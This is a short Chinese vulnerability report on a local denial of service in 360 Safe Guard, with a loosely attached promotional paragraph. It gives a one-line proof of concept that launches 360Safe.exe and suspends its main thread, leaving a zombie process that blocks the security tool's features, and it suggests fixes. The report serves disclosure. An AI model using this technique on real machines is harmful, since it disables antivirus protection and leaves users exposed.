360安全卫士本地拒绝服务
360安全卫士一直以来主打在线安装模式,只需联网即可轻松安装最新版本,安装过程非常的简单快速,基本上都是全自动完成的,无需人工干预,非常傻瓜智能。提供几十种各式各样的功能。
攻击者利用该漏洞会导致用户无法启用360安全卫士的功能,如木马查杀、清理垃圾等,实现拒绝服务。
由于界面进程存在单例特性,因此当存在一个僵尸界面进程后,再点击快捷方式或者右键点击Tray都无法启动360safe
CreateProcess("C:\\Program Files\\360\\360safe\\360Safe.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)Sleep(5000);SuspendThread(pi.hThread);
修复方案: 1.完善单例检查的逻辑
2.及时清理僵尸进程
电脑清理新增“一键清理”和“自动清理”,电脑垃圾和痕迹一键完成扫描清理,更可在电脑空闲时自动帮您清扫垃圾,让系统保持流畅快速!
……